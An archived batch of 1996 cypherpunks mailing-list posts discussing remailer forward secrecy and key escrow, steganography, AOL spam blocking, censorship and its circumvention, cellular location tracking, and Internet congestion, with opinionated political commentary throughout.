>comparison."  (New York Times 5 Sep 96 C2)

	There's been a court suit to stop AOL from doing so, which appears
to have gotten a temporary injunction to that effect... I'll forward the
details.

>CHINA SCREENS OUT "SPIRITUAL POLLUTION" ON THE NET
>The Beijing government has begun blocking as many as 100 Internet sites that
>offer material the government deems unsuitable for its citizens -- including
>dissident viewpoints from Hong Kong and Taiwan, sites sponsored by U.S.
>major media organizations such as CNN and the Washington Post, and sexually
>explicit sites such as Playboy and Penthouse.  An official described the
>blocked sites as suspected purveyors of "spiritual pollution."  (Wall Street
>Journal 5 Sep 96 B12)

	Hmm... funny similarity between Chinese objections of "spiritual
pollution" and ASEAN objections of "cultural" problems, isn't there?

[...]

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Roy Lichtenstein (if your name is Roy Lichtenstein;  otherwise, substitute
>your own name).  ...  To cancel, send a message to: listproc@educom.unc.edu
>with the message: unsubscribe edupage.   (If you have subscription problems,
>send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 12:08:32 +0800
To: "E. Allen Smith" <cypherpunks@toad.com
Subject: Re: Cellular phone tracing
Message-ID: <199609070057.RAA25948@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:49 PM 9/6/96 EDT, E. Allen Smith wrote:
>	From comp.risks:
>
>Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT)
>From: glassman@sunsite.unc.edu
>Subject: FedEx monitoring of cellular phonecall locations
>
>[...] nowhere near either of those places, so I did not bother to mention my
>current location to the operator. The next day, Saturday, I called FedEx
>with the same cell phone from Blowing Rock to arrange the pickup. The
>operator immediately asked if I wanted them to come to the intersection that
>I had placed my call from the day before.
>
>Two days later, a FedEx operator confirmed that they are getting "new
>systems" at some locations that are able to record the locations from which
>cellular calls are placed.
>
>I have now asked Cellular One three times to explain to me why they do not
>tell subscribers that they pass this location information through the
>system, but to no avail. [...]
>
>========== end fwd.


You should DEFINITELY start worrying when the FexX operator says something 
like, "I see you're the guy in the red shirt and brown pants."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 8 Sep 1996 00:50:51 +0800
To: loki@obscura.com
Subject: forward secrecy in mixmaster
Message-ID: <199609061703.SAA00170@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Since Peter Allen's discussion of mixmaster, I started doing something
I'd been thinking of for a while, since noticing that it was on the
mixmaster to-do list months ago (ie there is unfinished source to do
this): direct socket connections and diffie-hellman key exchange for
forward secrecy.

I wrote the socket stuff yesterday evening, didn't take too long as
socket programming is something I've done lots of.

Now comes what do you actually send down the sockets.

Question for Lance, and any others who were involved in mixmasters
implementation: what did you have in mind as a way of negotiating the
DH keys?

I notice that mixmaster generates a DH key and stores it in file
`DH.mix', but that this is not (as far as I can see from the source)
included in the remailers public key block.

(A couple of comments as an aside: I think that you should be able to
have a much smaller generator without loss of security, this should
reduce the overhead of a DH key exchange.  Using 3 even I think is
safe, without any extra precautions on prime generation.  You can even
go to 2, with a few precautions (PGPfone does this).  Comment #2 I
think 1024 may be a bit small, I don't have any figures handy for
relative security of DH key lengths, but PGPfone offers 4096 bit DH
for instance.  Does rsaref have limits on prime lengths for DH, the
same as it does for RSA?).

There are lots of options for DH public key negotiation.

First option is whether you have a common prime and generator for all
remailers or not.  If you have a common prime, accusations of the
prime being `cooked' (chosen to have a weakness) can be mitigated by
using a deterministic generation method based on the hash of a known
phrase (a Jefferson quote perhaps), or PI or whatever.

A common modulus may offer a fatter target for attack (for some
precomputation attacks), but with large enough keys this probably
isn't that bad, as there aren't that many mixmasters anyway.

With a common modulus there is DH key negotiation needed, just include
it with the source.

For different modulii for each remailer, there are more options:

a) include the DH key signed by the RSA key in the remailers public key
   (may break backwards compatibility with existing versions of
   mixmaster)

b) send the DH public key at the start of each session

c) send the DH public key on request

There is also a question of which key do you use, the sender remailers
or the recipient remailers.

Negotiating DH public keys during execution also opens the possibility
for periodic re-keying.

Thats the end of my thoughts on direct socket mixmaster.

Next message is some thoughts on non-interactive forward secrecy
protocols.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 7 Sep 1996 09:40:53 +0800
To: cypherpunks@toad.com
Subject: Court challenge to AOL junk-mail blocks
Message-ID: <01I961K8307I9JDL62@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I wouldn't personally use AOL in any event, but their use of
their computers is their business. I do have some doubts as to whether
AOL subscribers necessarily signed on for this - as noted on the
list-managers list, a consent arrangement would thus be preferable. The
other argument of the Cyber Promotions jerks is nonsense - how does AOL
blocking affect the rest of the Internet?
	-Allen

>PHILADELPHIA, Pa. (Sep 6, 1996 12:23 p.m. EDT) -- A federal judge has =
>ordered America Online to stop blocking up to 1.8 million "junk" e-mail =
>files flooding subscribers' electronic mailboxes daily from a =
>Philadelphia marketing firm.

[...]

>Pending a trial tentatively scheduled for Nov. 12, U.S. District Judge =
>Charles R. Weiner ordered AOL Thursday to lift the block on Cyber =
>Promotions' mailings. Weiner is presiding over a suit Cyber Promotions =
>Inc. filed accusing AOL of trying to drive it out of business.

>Cyber Promotions controls three of the five sites blocked by AOL. The =
>others -- one that distributes software to create bulk e-mail lists and =
>one that had sent out ads for Internet video porn -- were not affected =
>by Weiner's order.

>AOL attorney David Phillips said the company was considering an appeal. =
>He said AOL customers had been "complaining vociferously about Cyber =
>Promotions' junk mail."

>Sanford A. Wallace, the president of Cyber Promotions, was pleased about =
>the decision.

>"We feel that America Online has violated the civil rights of their =
>members and has violated our rights to send e-mail through the Internet, =
>which AOL does not own," he said.

>Although unsolicited mail sent through the post office in the United =
>States is not considered illegal, the rules have yet to be defined in =
>cyberspace. The larger services -- AOL, Prodigy and Compuserve -- all =
>have policies forbidding mass junk mailings




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Sat, 7 Sep 1996 12:16:38 +0800
To: cypherpunks@toad.com
Subject: Re: Junk Phone Calls, Metered Usage, and Cellphones
Message-ID: <9609070109.AA29863@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



tcmay@got.net (Timothy C. May) writes:
>I am about to start worrying about "junk phone calls" more so than I have
>been. I just bit the bullet and bought a digital cellular phone, with a
>nifty rate plan called Digital Flex: I get unlimited free airtime from 7
>p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south
>of Salinas to north of Santa Rosa and as far east as the Central Valley. In
>other words, the entire Bay Area and outlying communities. I can send and
>receive calls over this entire region, from anywhere in the region (of
>course), without any charges.
>
>The downside is that calls _from_ or _to_ my phone during "business" hours
>are charged 42 cents a minute, airtime (tying up a channel and all), plus
>whatever other fees may be applicable at each end. Thus, every "junk call"
>I get trying to get me to buy aluminum siding, or to vote Democratic, or to
>switch my long-distance carrier (!), costs me a minimum of 42 cents,
>depending on how fast I can realize who they are and get rid of them

I have a similar plan.  My cell phone company includes call forwarding
in the package, so I deal with the possibility of junk calls by forwarding
calls from my cell phone to my regular number (which has voicemail)
during the day, then turning off the cell phone.  This way, the calls
are intercepted right at the switch (I assume), so no airtime is used,
and no charges are incurred.  Works for me...

--
Martin Janzen           janzen@idacom.hp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 7 Sep 1996 09:45:25 +0800
To: omega@bigeasy.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960906224034.00aed230@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Indeed. It appears the Unabomber has taken away the privelege of 
>dropping stamped mail weighing over 16ozs into street-side mailboxes. 
>One is now instructed to take these packages to a post-office mail 
>clerk for mailing.

So switch to Fedex.  The P.O. gives lousy service anyway.  Privitize.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 7 Sep 1996 06:40:05 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Race Bit: C
In-Reply-To: <199609061750.KAA06787@mail.pacifier.com>
Message-ID: <Pine.SUN.3.95.960906183926.28427A-100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Sep 1996, jim bell wrote:

> At 05:05 AM 9/6/96 +0000, jonathon wrote:

> used to test out hypotheticals, for example a "SimEconomy."   For example, 

	They are very hard to program, and the ones that do exist are
	based on the usually flawed assumptions that the designers make.
	EG:  taxation is a requirement for government stability

> I, for one, would love to be able to program in an immediate 25%+ reduction 
> computer-based simulation wouldn't just blindly do the cuts, but would also 
> estimate the secondary and tertiary effects of such cuts, for example 

	Those are very hard to figure out in advance.

	Silicon Valley, for one, developed because the government 
	closed several military facilities there.   Other examples
	do exist.   << I think it was CATO that published a paper
	showing that closing military bases caused a short term impact
	in business, but three to five years later, more business, and
	with greater diversification, than had the military base stayed.

	However, such development does not occur, when local government
	authorities do not permit it to happen -- which is the usual 
	state of affairs.  <<  Can a simulation program put cover the
	situation where a government cries out for more development,
	and then prohibits it?  That is exactly what most city governments
	do, and some state governments are starting to do.  >>

> if the average citizen were made aware of how simple the changes were, he'd 
> be less tolerant of special-interest politics.

	The average voter doesn't see any further than the bribe s/he 
	is paid by whichever criminal is trying to inflict his/her 
	mode of destruction on them, come the second tuesday of november.

        xan

        jonathon
        grafolog@netcom.com



	All people in the employ of government agencies are death-dealers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sat, 7 Sep 1996 10:24:49 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Job for netescrow ? (was Secure anonymouse server protocol...
In-Reply-To: <199609061322.OAA01150@server.test.net>
Message-ID: <199609062250.SAA13820@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back <aba@dcs.ex.ac.uk> writes:
>
>Peter Allan <peter.allan@aeat.co.uk> writes on cpunks:
>> In the talk about replyable nym-mailers I haven't
>> yet seen netescrow mentioned.
>> 
>> You DID all read this ?
>> 
>> [Matt Blazes  Oblivious Key Escrow paper]
>>
>> This all hinges on a policy to be followed by archive holders defining
>> the conditions under which they release their shares.  
>> This could be receipt of a signed request from the owner (remailer).
>> 
>> Maybe the table relating nyms to reply addresses could be stored in
>> netescrow style so that captured remailers reveal nothing.  The problem
>> of operator coercion is not addressed by this.
>
>Just to clarify, if I understand correctly you are proposing a penet
>style system with the database held in `netescrow'.
>
>The remailer in normal operation has access to the database by making
>requests satisfying the conditions of the secret share holders.
>
>When the remailer is compromised the memory resident key is lost when
>the machine is switched off, and the owner refuses to release the key.
>
>Is what you are proposing?
>
>It sounds like a cross between Matt's netescrow and Ross Anderson's
>eternity file system.  Your penet database is being stored in a
>distributed file system, with shares, and the identity of the share
>holders is concealed.  However the aim is not to prevent others
>censoring your publically available writings, but to allow a second
>avenue of access only in the case of `mob cryptography'.
>
>This changes the system over storing the database encrypted on the
>remailer machines own disk in these ways:

[well-thought-out stuff deleted]
This is the first I've seen this proposal to use Oblivious Key Escrow
(OKE) as a store for a remailer database; apologies if all this has
been discussed already (I don't ready cypherpunks very often these
days).
     
My original idea for OKE was as a way to backup long-term,
slow-changing sensitive data without also introducing a single point
of failure for either security or availability.  The remailer model is
a bit different, and I'm not sure it's a good fit, in particular
because I haven't thought about the various new failure modes in this
application.  But let me think ``out loud.''

Suppose we want to build a persistent-reply address anonymous
messaging service (like the late anon.penet.fi) with the following
properties:

        a) The database that maps anonymous addresses to real
           addresses is secure against erasure or other permanent loss
           of availability
        b) The database is also secure against accidental or coerced
           disclosure.

Requirement (a) implies backups and persistent storage.  Requirement
(b) implies that both access to both operational and backup copies
must be carefully controlled, preferably by technical means.  So far,
this looks like a good candidate for distributed security, in the
style of OKE, Mike Reiter's Rampart service, or Ross Anderson's
Eternity service.

Actually, I think the best solution would be for the remailer itself
to be a distributed process, split among enough places to make it
difficult for anyone to attack enough nodes to compromise or recover
the address translation database.  It is not at all obvious how to do
this in practice, however, since any solution would need to combine
secure distributed computation (to calculate the mapping for each
message sent without revealing to any party, including the sender,
what the mapping is) with anonymous networking techniques such as
mixes to prevent traffic analysis from revealing the mapping.  There
are a number of unsolved theoretical and practical problems here, and
I think working out the details of such a system would make for a good
PhD thesis or two (quite seriously, and I'd be interested in talking
with anyone who wanted to pursue such a line of research).

So for now let's limit ourselves to existing tools and techniques, or
at least tools and techniques that are close to existing.  Let's say,
for the moment, that we wanted to base the system on OKE.

Assume an unconditionally trusted remailer operator whose goal is to
construct a system that resists attempts to force him or her to
UNILATERALLY reveal the database.  That is, it should not be possible
to force the remailer operator to reveal the database contents without
also enlisting the aid of the (collectively anonymous) oblivious key
holders.  My (not carefully considered) first thought is that the
address database would be encrypted and stored locally, using a key
that is escrowed using OKE.  The key would never be locally stored;
preferably, the key would exist only in memory.  The operating system
on which the remailer is run would delete this key ``at the drop of a
hat,'' e.g., any time the system was rebooted, any time someone logs
in, any time unusual activity of any sort is detected.  The key
release policy is controlled by a public key, for which the secret key
is stored in a more persistent manner (e.g., in the file system).  
Whenever the database key is deleted, the OKE recovery process is used
to recover the key automatically, and the database is re-encrypted
with a new key that is distributed to a new set of shareholders.
Under normal operation, this might happen once a month or so, and
might entail (because of policy-based delays and the time required to
collect shares) a few days of downtime.

Under unusual conditions that might precipitate some kind of coercive
situation, the remailer operator (or some automatic process on the
remailer machine) would delete the signing key as well as the
database.  It might be reasonable, for example, to delete this file
any time someone logs in to the remailer machine (which shouldn't be
needed ordinarily).  The OKE share policy would require that the
shareholder operator examine unsigned key requests manually before
releasing them.  If the keys were deleted because of a false alarm or
machine failure, the remailer operator would send a message saying
something to the effect of ``Hey, I blew it.  Please send me the key
shares once you're convinced no one has a gun to my head.''  In the
event of a public safety emergency, the police are free to attempt to
issue their own appeal for key shares, but the ability to for them to
do this is not a design goal, but rather a side-effect of the design.

I see a number of problems with using OKE for this.  In particular,
key recovery is moderately expensive and key distribution with the
oblivious multicast protocol in my paper can be very expensive.  If
keys are deleted regularly, the downtime could be unacceptable.  I'm
not sure OKE is entirely workable for this application, but perhaps a
more clever design could prove me wrong.

There are a whole bunch of engineering issues here, particularly
related to automatically detecting ``unusual'' situations.

So can this scheme be improved upon?  Is there a better way to run a
persistent-reply-address remailer?  These are interesting, and I think
largely open, questions.

-matt

NB  The oblivious key escrow paper that I presented at the Information Hiding
workshop at the Isaac Newton Institute in May, is available at:
        ftp://ftp.research.att.com/dist/mab/netescrow.ps






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 7 Sep 1996 12:58:08 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Metcalf and Other Net.Fogies
Message-ID: <3.0b15.32.19960906182157.0101cd6c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 AM 9/5/96 -0700, Timothy C. May wrote:

>Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how
>publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a
>few minutes ago. He repeated his prediction of an "Internet collapse" in
>1996, based on overuse, on bad pricing models, on lack of controls, and on
>other concerns.

Some are griping just to gripe.  Metcalfe may have a valid prediction here.

I have a machine that I use for work that is connected to the net via
ethernet.  No 28.8k bottlenecks involved.  Most of the time I am lucky if I
can exceed 14K bps to anything outside the local area.  When I run
traceroutes, the blockage is in MCI or Sprintnet land.  (Except for the one
to ftp.funet.fi early this week where where two of the machines somewhere
in California were caught in some sort of weird DNS loop.)

The bandwidth to the net has been oversold.  If the government were
*Really* concerned about "protecting the net", they would be on MCI and
Sprint's cases, not looking for virtual terrorists.  (Virtual Terrorists
are to Terrorists the same way that Virtual Reality is to actual reality.)
There have been days where you could not move anything at any reasonable
speed from certain areas of the country.

Yes, people have been predicting the end of the net (GIF/JPEG/WAV at 11!)
since it was founded.  In this case, I think that the person has enough
network experience to be right.  With the way things are now with oversold
bandwidth, the DNS numbers getting close to being used up, many of the
routers needing to be replaced and/or upgraded, and software that uses
bandwidth like candy (phone conversations, video conferencing, huge
interactive web page animations (like shockwave), real audio, and more as
the marketing droids can sell you on it.), the chances of a west coast
power-system style collapse does not seem that far from reality.  (There
are many who I know in the industry that are amazed that it has lasted this
long.)

On a smaller scale, those collapses happen in a small regional area, get
fixed and things go on.  But just like the earthquakes in California,
everyone is waiting for "the Big One".  (At least this one is preventable.
Lets hope that the fixes can occur before the government gets involved,
otherwise the net *IS* really doomed.)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Sat, 7 Sep 1996 12:03:01 +0800
To: makof@alias.cyberpass.net (makofi)
Subject: Re: Steganography -- Tell-tale signs?
In-Reply-To: <199609051651.JAA06856@sirius.infonex.com>
Message-ID: <199609070003.TAA11985@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hi there!
> 
> I'd appreciate some help from you experts in 
> steganography.
> 
> 1) If I hide some PGP encrypted data in a
> gif, jpg or wav file will there be any tell tale 
> signs to the naked eye of an expert? If yes,
> what are they?

If you stego too many bits in a figure, it may become apparent.

> 
> 2) Would it better to hide the data in 
> a jpg with black and white image rather
> than a color one?
> 

24 bit color has more data, therefore its easier to hide random data.

> 3) Are there any tools at the moment 
> to expose (not crack) the hidden encrypted 
> data? If none. are there tools in development?

Not really.  If you make sure there are no predictable headers, and use a
good encryption algorithm, it is almost impossible to tell the presence of
a hidden file unless you compare a file untouched with the one with data
in it.

> 
> If this appears twice please accept my apologies.
> I didn't see the first posting and so I assumed it 
> was lost in transit. Please email replies to me 
> directly if this is off-topic. Thank you.
> 
> Makofi
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Sat, 7 Sep 1996 04:16:48 +0800
To: cypherpunks@toad.com
Subject: electronic offshore banking
Message-ID: <Pine.GSO.3.93.960906191645.5543C-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain



Are there any good offshore banks that would allow you to use your account
over the Internet?

I know European Union Bank www.eub.com is on of those available, but their
US$ 25.000 minimum deposit is too stupid.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 7 Sep 1996 11:01:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Race Bit: C
Message-ID: <9609062346.AA24494@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Sep 96 at 10:50, jim bell wrote:


> Since red liquid running in the streets is generally so reviled, one
> of the things which mystifies me is why there aren't more
> simulation-type programs used to test out hypotheticals, for example
> a "SimEconomy."   For example, you'll occasionally hear about a
> media news organization gathering a dozen or so volunteers in a
> room, and asking them to solve a problem like "The Budget Deficit"
> or some such.   The result of their interplay is generally used to
> explain why these problems are hard to solve.

Why do you suppose that solving the problem they created is their 
goal?  On a more fundamental level, why do you assume the their goal 
is to improve life at all?  Ask yourself if this is what they truly 
want.

jfa
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultant
    physicists, technologists and engineers
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 7 Sep 1996 11:06:35 +0800
To: cypherpunks@toad.com
Subject: Re: What the NSA is patenting
Message-ID: <9609062352.AA24858@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


A maybe usefull program would be a little tsr that constantly 
overwrite unused sectors of the entire drive with random patterns 
(maybe seeded with a fast keyboard interval timer).  Like at the very 
moment I am writing this, my HD has been idle for several minutes...

One more of my silly ideas

JFA
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultant
    physicists, technologists and engineers
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 7 Sep 1996 15:11:50 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Race Bit: C
Message-ID: <199609070438.VAA09119@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:49 PM 9/6/96 +0000, jonathon wrote:
>On Fri, 6 Sep 1996, jim bell wrote:
>> used to test out hypotheticals, for example a "SimEconomy."   For example, 
>
>	They are very hard to program, and the ones that do exist are
>	based on the usually flawed assumptions that the designers make.
>	EG:  taxation is a requirement for government stability

A few months ago, somebody posted onto CP a phony story, which claimed that 
"somebody" had developed an artificially-intelligent program which would 
take the place of the judge and (?) jury in the (so-called) justice system.  
It was an obvious phony, but I thought it was even more obvious, even if we 
assumed the existence of a program which is smart enough to interpret 
evidence and laws.  

The problem is, the "legal system" is practically saturated with unwritten 
biases which favor the rich over the poor, the strong over the weak, and the 
government over everybody else.  Any program which read the Constituion  and 
the laws wouldn't see those biases, and would start writing 
decisions...respecting the Constitution!  It would presumably view the 
violation of someone's Constitutional rights as a criminal act, and it would 
be hard for the cops to stay out of jail.  The standard for conviction, 
"beyond a reasonable doubt," when religiously  adhered-to would make 
convictions difficult to obtain.  The program would look for Constitutional 
justification for anti-drug laws, and finding none, would ignore such 
violations but would convict anyone trying to enforce them.  Likewise, it 
would read the second amendment (and the lack of authority for regulating 
guns in the rest of the Constitution) and conclude that guns were 
un-regulatable.  The program would see that nothing in the Constitution 
requires people to testify for the prosecution.  The program wouldn't see 
any justification for the judge-written concept of judicial civil immunity, 
or government-employee immunity in most cases.  The program would notice 
that double-jeopardy is prohibited, and would prohibit any retrials in which 
there are "hung juries" or government errors.  In other words, the 
government would actually have to start OBEYING THE CONSTITUTION! 

Ask most lawyers, and they'll say, 'No, that's not the way we do things.'  
In a sense, they're right!  That's NOT the way they do things.  And that's 
the problem!

   This would be considered unacceptable; the program would be declared 
"broken" and "useless."  Sure, it could be fixed, but they'd have to qualify 
and quantify all of the biases currently present in the system, and write 
them into the program in the form of subroutines.  The problem is, nobody 
who actually supports these biases would want to acknowledge what they are 
and why they're there, and nobody who opposes these biases would agree to 
keep them.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sat, 7 Sep 1996 15:02:55 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <199609070433.VAA26061@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About:  6 Sep 96 at 23:16, Damaged Justice wrote:

> 
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all.

Sure. I agree with that, no shoes no shirt, if you are on AOL you 
accept "internet-lite".

> The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.

Right now.  Yet it has been apparent to me that many people are 
begging for restrictions to be put in place.  Restrictions on 
spammers.  The government saying anything about regulation of the 
internet is bad...  Yet people still scream about a couple of 
unwanted e-mails.  I'm saying that this spammer thing could be the 
"kink in our armour" that lets the government into our little 
playground here.  Just suck it up and delete those messages.

Jog it off.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 8 Sep 1996 00:54:05 +0800
To: coderpunks@toad.com
Subject: non-interactive forward secrecy
Message-ID: <199609062108.WAA00230@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



[This discussion is driven by the desirability of having forward
secrecy in mixmaster for the mix packets delivered by email where the
interactive nature of normal DH is incovenient]

Anyone have any ideas for a non-interactive forward secrecy protocol?

Aside from actually doing the DH key exchange via email (painful), I
have one suggestion for a protocol, perhaps people can improve on
this:

Assuming common prime p, and generator g:

Two remailers A and B.  A wants to send messages to B without having to
wait for replies from B.

B generates ys (y0,y1,...,yn), 

	where y(i+1) = hash(y(i))

then computes Ys (Y0,Y1,...,Yn)

	where Y(i) = g ^ y(i) mod p

B sends A Ys, and discards ys.

Now A can send B n consecutive packets with forward secrecy before
receiving any more packets from B.

(B keeps y0, and overwrites it with y1 = hash(y0), etc, so that all B
ever has to hand is the current y(i), and y(i-1) is hard to compute
from y(i) because of the hash functions properties.)

This isn't truly non-interactive, it just reduces the number of
interactions, to an interactive exchange in 1 out of n cases.

(you could randomly chose ys rather than having related ys, and delete
y(i) after use, but this has higher storage requirements (n rather
than 1 on the recipient)).


Heres the obvious construction for a truly non-interactive forward
secrecy protocol based on DH.  (That is it only requires 1
interactive exchange).

Aside from the obvious of having a huge n, and the above protocol,
which would have large space requirements, what we're after is a way
to do this with negligable space requirements.

Say that we have the two parties Alice and Bob.  Bob doesn't loose
much by having his secret (x) related as above.

1.	x(i+1) = f1( x(i) )
2.	X(i+1) = f2( X(i) )
3.      f1 is non reversible

f1 should have hash-like properties (it should be non-reversible).

Do functions f1 and f2 satisfying 1, 2 and 3 exist?  Is there another
way to achieve this?

(My closest attempt so far, based on the hardness of discrete square roots:

	f1(x) = x^2 (mod p)
	f2(X) = X^2 (mod p)

doesn't work because g^(x^2 mod p) mod p != g^(x^2) mod p)

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Sat, 7 Sep 1996 13:30:17 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960906224034.00aed230@panix.com>
Message-ID: <199609070220.WAA01026@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So switch to Fedex.  The P.O. gives lousy service anyway.  Privitize.
> 

Try & mail an anonymous FedEx package.
Try and pay cash in most Fedex offices.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Sat, 7 Sep 1996 08:44:10 +0800
To: gary@systemics.com
Subject: Re: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To: <322E94B9.41C67EA6@systemics.com>
Message-ID: <m0uz7on-0000AiC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>I wonder how they are doing this?  We know that the Germans allow full
>internet access (don't they?), so they can't be using a filtering http
>proxy.  I guess they're blocking on IP number (and perhaps port).

One ISP uses a filtering proxy which still can access xs4all,
while blocking the HTTP port to www.xs4all.nl for their users.
Others simply block the IP number.

Of course, everyone still can use the mirror sites, the anonymizer,
open proxies, free Lynx accounts and www-by-mail services. The
prosecutors don't seem to understand that yet.

>might be a good idea for xs4all to gather up all of their spare IP
>numbers, and alias the lot on their web site - this would increase the
>number of blocked addresses needed.

They are already rotating IP numbers. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 7 Sep 1996 14:03:08 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Metcalf and Other Net.Fogies
In-Reply-To: <3.0b15.32.19960906182157.0101cd6c@mail.teleport.com>
Message-ID: <199609070255.WAA16715@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen writes:
> Metcalfe may have a valid prediction here.

Metcalfe is talking out his ass. He's reached the "old geezer who's
impeding his own field" stage. Many of his articles seem to be written
as though no one was trying to fix problems.

> When I run traceroutes, the blockage is in MCI or Sprintnet land.

How do you manage to determine where you are losing bandwidth using
traceroute? That must be a mighty powerful traceroute to do that --
most traceroutes I've seen are hard pressed just to find out what the
connectivity path is.

> The bandwidth to the net has been oversold.

